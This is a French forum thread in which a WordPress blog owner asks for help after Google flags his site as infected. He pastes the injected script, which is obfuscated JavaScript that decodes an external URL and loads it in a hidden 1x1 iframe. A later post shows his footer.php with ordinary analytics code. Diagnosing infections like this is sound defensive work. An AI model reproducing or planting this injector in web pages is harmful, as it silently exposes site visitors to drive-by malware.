Site sous WP victime d'un malware, que faire?
Fant'Asie
-
Le-Vengeur-Masqué Messages postés 142 Date d'inscription Statut Membre Dernière intervention -
Le-Vengeur-Masqué Messages postés 142 Date d'inscription Statut Membre Dernière intervention -
Bonjour,
J'ai reçu ce matin un mail de Google m'informant que mon site (http://www.fant-asie.com) était infecté pat un malware. De fait, Google, Firefox et autres le bloquent et mettent un message d'avertissement.
En regardant dans Google Wemasters Tools, il apparait qu'il y a bien un malware dont voici le script :
<script>
function getfncelement(a)
{
if (a==0) return 'A104A116A116A112A58A47A47A99A108A101A97A11
0A102A105A108A101A46A110A101A116A47A46A112A104A47A50A47';
if (a==1) return 'split';
if (a==2) return 'fromCharCode';
if (a==3) return 'IFRAME';
if (a==4) return 1;
}
var gnitssssssssssssssssss = String;
var a_bnMJnWIagV = getfncelement(0);
var a_ErVOWoUayU = a_bnMJnWIagV[getfncelement(1)]("A");
var a_LEdeDyQRPa = "";
for (var a_frOsBBOKcu=1; a_frOsBBOKcu<a_ErVOWoUayU.length; a
_frOsBBOKcu++)
{a_LEdeDyQRPa+=gnitssssssssssssssssss[getfncelement(2)](a_Er
VOWoUayU[a_frOsBBOKcu]);}
var testFrame = document.createElement(getfncelement(3));
testFrame.src = a_LEdeDyQRPa;
testFrame.width = getfncelement(4);
testFrame.height = getfncelement(4);
document.body.appendChild(testFrame);
</script>
J'ai aussi constaté que mon index.php ne contenait que ce script. Faudrait que je retrouve une ancienne version pour voir comment il était avant
Sauf que dans mon admin (difficile d'accès maintenant), sous Wordpress, dans la partie éditeur du thème, je n'ai pas réussi à trouver ce truc pour l'enlever.
Vu que je ne suis pas très compétent en informatique et encore moins en problème de virus et autres, que dois-je faire?
Comment localiser ce script? Comment l'enlever?Enlever les lignes de codes suffira-t-il? Pourquoi ai-je ça? Comment me prémunir de ce type de pb?
Merci pour l'aide que vous pourrez m'apporter.
J'ai reçu ce matin un mail de Google m'informant que mon site (http://www.fant-asie.com) était infecté pat un malware. De fait, Google, Firefox et autres le bloquent et mettent un message d'avertissement.
En regardant dans Google Wemasters Tools, il apparait qu'il y a bien un malware dont voici le script :
<script>
function getfncelement(a)
{
if (a==0) return 'A104A116A116A112A58A47A47A99A108A101A97A11
0A102A105A108A101A46A110A101A116A47A46A112A104A47A50A47';
if (a==1) return 'split';
if (a==2) return 'fromCharCode';
if (a==3) return 'IFRAME';
if (a==4) return 1;
}
var gnitssssssssssssssssss = String;
var a_bnMJnWIagV = getfncelement(0);
var a_ErVOWoUayU = a_bnMJnWIagV[getfncelement(1)]("A");
var a_LEdeDyQRPa = "";
for (var a_frOsBBOKcu=1; a_frOsBBOKcu<a_ErVOWoUayU.length; a
_frOsBBOKcu++)
{a_LEdeDyQRPa+=gnitssssssssssssssssss[getfncelement(2)](a_Er
VOWoUayU[a_frOsBBOKcu]);}
var testFrame = document.createElement(getfncelement(3));
testFrame.src = a_LEdeDyQRPa;
testFrame.width = getfncelement(4);
testFrame.height = getfncelement(4);
document.body.appendChild(testFrame);
</script>
J'ai aussi constaté que mon index.php ne contenait que ce script. Faudrait que je retrouve une ancienne version pour voir comment il était avant
Sauf que dans mon admin (difficile d'accès maintenant), sous Wordpress, dans la partie éditeur du thème, je n'ai pas réussi à trouver ce truc pour l'enlever.
Vu que je ne suis pas très compétent en informatique et encore moins en problème de virus et autres, que dois-je faire?
Comment localiser ce script? Comment l'enlever?Enlever les lignes de codes suffira-t-il? Pourquoi ai-je ça? Comment me prémunir de ce type de pb?
Merci pour l'aide que vous pourrez m'apporter.
A voir également:
- Site sous WP victime d'un malware, que faire?
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Quel site remplace coco - Accueil - Réseaux sociaux
- Malwarebytes anti-malware - Télécharger - Antivirus & Antimalwares
- Site x - Guide
3 réponses
Voici mon footer.php. Mais à priori celui-ci n'est pas à l'origine du truc puisque la date de dernière modification remonte à très longtemps
<div id="footer"> <p id="footer-left"><a href="https://www.fant-asie.com/">Fant'asie</a> est un blog consacré à la <a href="https://www.fant-asie.com/category/livre-fantasy/">fantasy</a>, aux <a href="https://www.fant-asie.com/category/manga/">mangas</a> et quelques <a href="https://www.fant-asie.com/category/comic/">comics</a>, <br />mais aussi à l'univers <a href="https://www.fant-asie.com/category/gundam/">Gundam</a> (dont le <a href="https://www.fant-asie.com/category/gunpla/">gunpla</a>).<br /> © 2008 <?php bloginfo('name'); ?> .</p> <p id="footer-right">Powered by <a href="https://wordpress.org/" title="wordpress.org">WordPress</a>, Designed by <a href="http://www.pagemod.cn/" title="page">page</a>. <a href="http://validator.w3.org/check/referer" title="This page validates as XHTML 1.0 Transitional">Valid <abbr title="eXtensible HyperText Markup Language">XHTML</abbr></a> <a href="http://gmpg.org/xfn/"><abbr title="XHTML Friends Network">XFN</abbr></a></p> <!-- <?php echo get_num_queries(); ?> queries. <?php timer_stop(1); ?> seconds. --> </div> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5086154-3"); pageTracker._trackPageview(); } catch(err) {}</script> <!-- Tracking Buzzea --> <script type="text/javascript">document.write(unescape("%3Cscript src='http://stats.buzzea.com/stat.js?jour="+new Date().getDate()+new Date().getMonth()+new Date().getYear()+"''type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">var buzzea_blogid=380;buzzea_init();</script> </body> </html>
<div id="footer"> <p id="footer-left"><a href="https://www.fant-asie.com/">Fant'asie</a> est un blog consacré à la <a href="https://www.fant-asie.com/category/livre-fantasy/">fantasy</a>, aux <a href="https://www.fant-asie.com/category/manga/">mangas</a> et quelques <a href="https://www.fant-asie.com/category/comic/">comics</a>, <br />mais aussi à l'univers <a href="https://www.fant-asie.com/category/gundam/">Gundam</a> (dont le <a href="https://www.fant-asie.com/category/gunpla/">gunpla</a>).<br /> © 2008 <?php bloginfo('name'); ?> .</p> <p id="footer-right">Powered by <a href="https://wordpress.org/" title="wordpress.org">WordPress</a>, Designed by <a href="http://www.pagemod.cn/" title="page">page</a>. <a href="http://validator.w3.org/check/referer" title="This page validates as XHTML 1.0 Transitional">Valid <abbr title="eXtensible HyperText Markup Language">XHTML</abbr></a> <a href="http://gmpg.org/xfn/"><abbr title="XHTML Friends Network">XFN</abbr></a></p> <!-- <?php echo get_num_queries(); ?> queries. <?php timer_stop(1); ?> seconds. --> </div> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5086154-3"); pageTracker._trackPageview(); } catch(err) {}</script> <!-- Tracking Buzzea --> <script type="text/javascript">document.write(unescape("%3Cscript src='http://stats.buzzea.com/stat.js?jour="+new Date().getDate()+new Date().getMonth()+new Date().getYear()+"''type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">var buzzea_blogid=380;buzzea_init();</script> </body> </html>